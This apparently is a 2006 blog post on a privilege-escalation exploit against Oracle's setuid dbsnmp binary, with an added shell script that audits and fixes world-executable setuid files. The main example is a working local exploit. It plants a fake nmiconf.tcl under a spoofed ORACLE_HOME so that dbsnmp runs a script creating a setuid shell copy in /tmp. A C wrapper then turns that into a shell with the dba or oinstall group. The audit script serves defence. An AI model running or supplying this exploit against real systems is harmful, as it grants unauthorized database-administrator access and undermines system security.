21 March 2006
Dbsnmp setuid exploit
Setuid
Setting the setuid bit in an executable’s mode bits allows a non-privileged user to temporarily gain the privileges of another user. Many of Oracle’s executables have setuid set: the oracle binary, dbsnmp, lsnrctl, ...
The main workaround for the setuid problem is removing the execute privilege from the "others" group.
If you run root.sh after the installation, dbsnmp will not be executable by group "other". If you don't run root.sh, or if you add the execute privilege to the "other" group, you are open to this exploit.
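As an added example (not part of the original post), the following POSIX shell functions audit a directory tree for the exposure described above: setuid or setgid regular files that are still executable by "others", and then remove the others bits the way root.sh does for dbsnmp. The ORACLE_HOME layout in the demo is constructed, not a real installation.

```shell
#!/bin/sh
# Added example: find and fix setuid/setgid binaries that are executable by
# "others". Paths used in demo() are constructed for illustration only.

# audit_setuid_world_exec DIR
# Lists (ls -l) every regular file under DIR that has the setuid or setgid bit
# and also the others-execute bit, i.e. the -rwsr-s--x situation from the post.
audit_setuid_world_exec() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -perm -0001 \
        -exec ls -l {} \; 2>/dev/null
}

# count_setuid_world_exec DIR
# Same filter, but returns only the number of offending files (for scripting).
count_setuid_world_exec() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -perm -0001 2>/dev/null \
        | wc -l | tr -d ' '
}

# fix_setuid_world_exec DIR
# Strips read/write/execute from "others" on each offending file; the file
# keeps its setuid/setgid bits and its owner/group permissions.
fix_setuid_world_exec() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -perm -0001 \
        -exec chmod o-rwx {} \; 2>/dev/null
}

# demo: constructed ORACLE_HOME with one exposed binary, one hardened, one plain.
demo() {
    home=$(mktemp -d)
    mkdir -p "$home/bin"
    : > "$home/bin/dbsnmp";  chmod 4551 "$home/bin/dbsnmp"   # -r-sr-x--x  exposed
    : > "$home/bin/lsnrctl"; chmod 4550 "$home/bin/lsnrctl"  # -r-sr-x---  hardened
    : > "$home/bin/sqlplus"; chmod 0755 "$home/bin/sqlplus"  # no setuid, ignored
    echo "Before: $(count_setuid_world_exec "$home") exposed file(s)"
    audit_setuid_world_exec "$home"
    fix_setuid_world_exec "$home"
    echo "After:  $(count_setuid_world_exec "$home") exposed file(s)"
    rm -rf "$home"
}

demo
```

Run it against a real ORACLE_HOME with audit_setuid_world_exec "$ORACLE_HOME/bin" first and review the list before applying fix_setuid_world_exec.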
Example:
If the dbsnmp executable (owned by root) has setuid set and --x for others (i.e. -rwsr-s--x), this exploit can be used on Oracle 8i or 9i to change the user's real group ID to oinstall or dba (whichever is the group of the dbsnmp file):
$ id
uid=1008(smith) gid=14(staff)
vi /tmp/cakehole
#!/bin/sh -p
cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh
export ORACLE_HOME=/tmp
mkdir -p /tmp/network/agent/config
vi /tmp/network/agent/config/nmiconf.tcl
#!/.../oratclsh
set n [ exec /tmp/cakehole ]
$ORACLE_HOME/bin/dbsnmp start
-rwsr-sr-x 1 smith dba 95316 Apr 28 11:31 /tmp/.sh OR
-rwsr-sr-x 1 smith oinstall 95316 Apr 28 11:31 /tmp/.sh
If you want to exploit /tmp/.sh, create a C program, for example called aaa.c:
#include <unistd.h>

int main () {
    setreuid (geteuid(), -1);   /* real uid := effective uid */
    setregid (getegid(), -1);   /* real gid := effective gid */
    execlp ("/bin/sh", "/bin/sh", (char *) 0); /* or use system() */
    return 0;
}
$ id
uid=1008(smith) gid=11(dba)